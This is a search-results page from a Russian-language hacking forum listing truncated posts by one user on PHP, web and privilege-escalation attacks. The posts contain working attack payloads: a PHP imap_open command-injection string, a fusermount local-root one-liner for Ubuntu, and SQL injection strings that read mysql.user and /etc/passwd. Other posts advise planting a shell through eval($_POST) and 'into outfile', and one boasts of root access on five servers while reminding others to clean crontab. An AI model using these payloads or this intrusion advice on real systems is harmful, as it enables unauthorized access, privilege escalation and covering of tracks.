Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 40.
На поиск затрачено 0.10 сек.
Поиск: Сообщения от: l1ght
Раздел: Уязвимости PHP/PHP vulnerabilities 18.11.2018, 09:05
Ответов: 22
Просмотров: 48,098
Автор l1ght
https://forum.antichat.ru/threads/463395/ ...

https://forum.antichat.ru/threads/463395/
imap_open('{x -oProxyCommand=`uname$IFS-a>s`}',1,1);

нужен php_imap соответсвенно
Раздел: Оффтоп/Offtopic 30.06.2016, 11:29
Ответов: 49
Просмотров: 45,112
Автор l1ght
спасибо, что перенесли в оффтоп. слабо верится...

спасибо, что перенесли в оффтоп. слабо верится что ребята из Х, качают софт с одностраничников типа всо-шелл.ру, путтидаунлоад.ру, и не знают автора wso. "прикалюха" не зашла. и респект 12309 за...
Раздел: Оффтоп/Offtopic 29.06.2016, 18:34
Ответов: 49
Просмотров: 45,112
Автор l1ght
Крыса-изгой это статус по жизни. Дискутировать с...

Крыса-изгой это статус по жизни. Дискутировать с вами о морали, незнакомец, у меня желания нет. И на понт брать тоже бесполезно. Если вы имеете отношение к этой авторитетной, уважаемой в ИТ ...
Раздел: Оффтоп/Offtopic 29.06.2016, 14:38
Ответов: 49
Просмотров: 45,112
Автор l1ght
1. об этом домене только 1 упоминание в...

1. об этом домене только 1 упоминание в поисковиках - в его статье
2. закладка стучит на поддомен
3. прямо под ссылкой на wso-shell ссылка на автора jpeg-payload от BlackFan на rdot.org (но ему не...
Раздел: Сценарии/CMF/СMS 27.06.2016, 00:48
Ответов: 29
Просмотров: 71,817
Автор l1ght
pma 4.6 работает на PHP 5.5 в котором убрали...

pma 4.6 работает на PHP 5.5 в котором убрали модификатор /e
pma 4.4 требует PHP 5.3.7 в котором не работает нулл байт
pma 4.0 в регулярке и вовсе не юзер контент а, образно говоря, статические...
Раздел: Оффтоп/Offtopic 21.04.2016, 22:09
Ответов: 7
Просмотров: 8,754
Автор l1ght
тоже интересует этот вопрос ..?

тоже интересует этот вопрос ..?
Раздел: Коммерция/Сommerce 07.10.2015, 13:35
Ответов: 87
Просмотров: 100,789
Автор l1ght
вводи ещё раз, че ты как целка ломаешься ))

вводи ещё раз, че ты как целка ломаешься ))
Раздел: Повышение привилегий/Privilege escalation 16.06.2015, 15:19
Ответов: 4
Просмотров: 10,943
Автор l1ght
Ubuntu 12.04, 14.04, 14.10, 15.04 - overlayfs...

Ubuntu 12.04, 14.04, 14.10, 15.04 - overlayfs Local Root (Shell)
https://www.exploit-db.com/exploits/37292/
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
#...
Раздел: Повышение привилегий/Privilege escalation 22.05.2015, 16:01
Ответов: 6
Просмотров: 11,797
Автор l1ght
Ubuntu 14.04.1 LTS $ a=/tmp/.$$;b=chmod\...

Ubuntu 14.04.1 LTS
$ a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a
fusermount: failed to open /etc/fuse.conf:...
Раздел: Оффтоп/Offtopic 15.04.2015, 03:44
Ответов: 259
Просмотров: 204,329
Автор l1ght
Здарова)) не,спасибо ) БигБир, видел...

Здарова)) не,спасибо )


БигБир, видел сервера изнутри/копался в их движках?)) посмотри в дампах ачата про ресерч одного из оных)
молодцы, если не используется, плохо такое в иб на хабр постить)
Раздел: Оффтоп/Offtopic 14.04.2015, 13:23
Ответов: 259
Просмотров: 204,329
Автор l1ght
http://habrahabr.ru/company/mailru/blog/255633/ ...

http://habrahabr.ru/company/mailru/blog/255633/
на скольких их поддоменах уже были шеллы,все равно не могут писать код без дыр)
<?php

function expand_template($file, $vars = NULL)
{
if...
Раздел: Сценарии/CMF/СMS 05.04.2015, 07:06
Ответов: 29
Просмотров: 71,817
Автор l1ght
кому лень качать двиг, /gis_data_editor.php ...

кому лень качать двиг,
/gis_data_editor.php
if (! isset($gis_data['gis_type'])) {
if (isset($_REQUEST['type']) && $_REQUEST['type'] != '') {
$gis_data['gis_type'] =...
Раздел: Уязвимости PHP/PHP vulnerabilities 21.11.2014, 14:01
Ответов: 4
Просмотров: 8,892
Автор l1ght
глянул с десяток, ничего особенного кроме...

глянул с десяток, ничего особенного кроме создания пустых файлов не нашел:(
смотрел встроенные классы движка/результат функции не используется дальше по коду?
Раздел: Уязвимости PHP/PHP vulnerabilities 21.11.2014, 01:48
Ответов: 4
Просмотров: 8,892
Автор l1ght
зависит от ветки php и установленных модулей,...

зависит от ветки php и установленных модулей, если "не на своем сервере" phpinfo в помощь, ставишь, ищещь функции для работы с файлами или консолью в get_declared_classes()+get_class_methods(); тут...
Раздел: Web-среда/Web-applications 21.06.2014, 20:57
Ответов: 38
Просмотров: 123,749
Автор l1ght
пожалуй это самый большой сдвиг в sql inj с...

пожалуй это самый большой сдвиг в sql inj с момента публикаций qwazar'а

дайте ему уже медаль генералиссимуса))

или ещё более коротко procedure analyse (0,updatexml(1,concat(0x3a,version()),1))...
Раздел: Повышение привилегий/Privilege escalation 18.06.2014, 02:06
Ответов: 21
Просмотров: 24,259
Автор l1ght
меня он тоже выручил, хочу добавить что не...

меня он тоже выручил, хочу добавить что

не взялось:


зато root на

магия)
Раздел: Повышение привилегий/Privilege escalation 13.06.2014, 11:30
Ответов: 1,219
Просмотров: 668,270
Автор l1ght
1966083 4 -rwxrwxrwx 1 root root ...

1966083 4 -rwxrwxrwx 1 root root 612 Mar 20 14:03 /home/restart/restart_is_is_down.sh
Раздел: Web-среда/Web-applications 13.04.2014, 07:20
Ответов: 3,618
Просмотров: 2,144,847
Автор l1ght
%'and(select(1)from(mysql.user)limit 1)='1 доступ...

%'and(select(1)from(mysql.user)limit 1)='1 доступ к mysql
%'and(if(load_file('/etc/passwd')is null,1,2))='1 file_priv
Раздел: Web-среда/Web-applications 12.04.2014, 01:45
Ответов: 3,618
Просмотров: 2,144,847
Автор l1ght
ну раз это винда,возможно mysql запущен от...

ну раз это винда,возможно mysql запущен от администратора eval($_POST[x]); смотришь конфиги,в $x передаешь mysql_connect+mysql_query("select 'shell' into outfile");
Раздел: Оффтоп/Offtopic 25.02.2014, 18:16
Ответов: 800
Просмотров: 334,140
Автор l1ght
не слежу за новостями,какие итоги,чего добились?...

не слежу за новостями,какие итоги,чего добились? прочитал заголовки - президент сбежал, чиновников хотят распустить, анархия в стране, кличко в президенты баллотируется. кто власть у вас...
Раздел: Web-среда/Web-applications 25.02.2014, 17:50
Ответов: 3,618
Просмотров: 2,144,847
Автор l1ght
нет там экранирования, темная хекерская интуиция...

нет там экранирования, темная хекерская интуиция знает какой php установлен на твоем сервере, для этого ей не нужен его ip :) при экранировании или чистке переменной ошибка выглядела бы не так, там...
Раздел: Web-среда/Web-applications 25.02.2014, 04:16
Ответов: 3,618
Просмотров: 2,144,847
Автор l1ght
вам же опытный хекер сказал)) в php >=...

вам же опытный хекер сказал))

в php >= 5.3.4 нулл байт не работает

посмотри версию php в phpinfo (или в заголовках сервера, или заинклудь существующий файл с нулл байтом)
Раздел: Повышение привилегий/Privilege escalation 19.06.2013, 05:41
Ответов: 17
Просмотров: 23,526
Автор l1ght
см. mount, мейби попадаются рид онли файловые...

см. mount, мейби попадаются рид онли файловые системы, писать можно не только в кронтаб..))
Раздел: Повышение привилегий/Privilege escalation 18.06.2013, 22:40
Ответов: 17
Просмотров: 23,526
Автор l1ght
9.1-RELEASE-p3 Apr 29 18:27:25 UTC 2013 # id ...

9.1-RELEASE-p3 Apr 29 18:27:25 UTC 2013
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
рандомно на 5 серверах рут .. воу воу полегче))
не забываем чистить кронтаб
Раздел: Web-среда/Web-applications 16.06.2013, 00:14
Ответов: 3,618
Просмотров: 2,144,847
Автор l1ght
Faaax, никак. все варианты открывающих тегов...

Faaax, никак. все варианты открывающих тегов начинаются c "<" http://php.net/manual/ru/language.basic-syntax.phpmode.php
Ereeee, ну раз не получается найти уникальную по длине ебашь посимвольно 100%...
Показано с 1 по 25 из 40.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot